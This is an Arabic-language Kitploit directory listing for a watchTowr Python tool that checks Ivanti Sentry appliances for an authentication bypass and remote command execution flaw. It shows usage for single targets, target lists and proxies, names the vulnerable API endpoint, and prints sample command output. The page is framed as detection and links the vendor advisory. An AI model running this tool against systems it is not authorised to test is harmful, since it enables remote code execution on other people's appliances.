Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RCE-CVE-2026-10520-CVE-2026-10523 — مولّد عناصر كشف لثغرات تجاوز المصادقة وتنفيذ الأكواد عن بُعد (RCE) في Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). يفحص هدفًا واحدًا أو أهدافًا متعددة، وينفّذ الأوامر، ويُبلّغ عن المضيفين المعرّضين للخطر. | Kitploit
أدوات/GitHubGitHub/imbas007/rce-cve-2026-10520-cve-2026-10523
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubimbas007/rce-cve-2026-10520-cve-2026-10523

RCE-CVE-2026-10520-CVE-2026-10523

مولّد عناصر كشف لثغرات تجاوز المصادقة وتنفيذ الأكواد عن بُعد (RCE) في Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). يفحص هدفًا واحدًا أو أهدافًا متعددة، وينفّذ الأوامر، ويُبلّغ عن المضيفين المعرّضين للخطر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 14س 38دلم تتم المراجعة بعد

CVE-2026-10520 وCVE-2026-10523

مولّد أدلة اكتشاف لتجاوز المصادقة وتنفيذ الأوامر عن بُعد في Ivanti Sentry.

انظر مقالنا على المدونة للتفاصيل الفنية.

الاكتشاف أثناء التنفيذ

root@kitploit:~
$ python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            

        CVE-2026-10523.py

        (*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool

          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2026-10520, CVE-2026-10523]

============================================================
Target: https://127.0.0.1
Command: uname -a

[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux

الاستخدام

هدف واحد:

root@kitploit:~
python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"

أهداف متعددة من ملف (رابط واحد في كل سطر، مع تجاهل الأسطر الفارغة وتعليقات #):

root@kitploit:~
python3 CVE-2026-10523.py -l targets.txt --cmd "uname -a"

استخدم وكيلًا (بروكسي):

root@kitploit:~
python3 CVE-2026-10523.py -l targets.txt --cmd "id" -p 127.0.0.1:8080

يقوم وضع القائمة بفحص كل هدف، ويواصل العمل عند أخطاء الاتصال، ويطبع ملخصًا للمضيفات المعرّضة للخطر في النهاية.

الوصف

يفحص مولّد أدلة الاكتشاف من watchTowr ثغرات تجاوز المصادقة وتنفيذ الأوامر عن بُعد في Ivanti Sentry: CVE-2026-10520 وCVE-2026-10523.

يمكن العثور على المعالجة والتفاصيل الإضافية داخل نشرة Ivanti الأمنية: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523

الفضل:

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة